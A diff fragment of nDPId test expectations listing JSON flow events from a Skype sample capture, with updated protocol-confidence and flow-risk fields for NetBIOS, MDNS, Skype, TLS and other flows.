-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970642412,"flow_last_seen":1431970643680,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970642408,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642417,"flow_last_seen":1431970643676,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642414,"flow_last_seen":1431970643673,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970642412,"flow_last_seen":1431970643680,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970642408,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642417,"flow_last_seen":1431970643676,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642414,"flow_last_seen":1431970643673,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634730,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":199,"flow_first_seen":1431970682971,"flow_last_seen":1431970705724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":77329,"flow_avg_l4_payload_len":388,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":199,"flow_first_seen":1431970682971,"flow_last_seen":1431970705724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":77329,"flow_avg_l4_payload_len":388,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
+00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}}
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
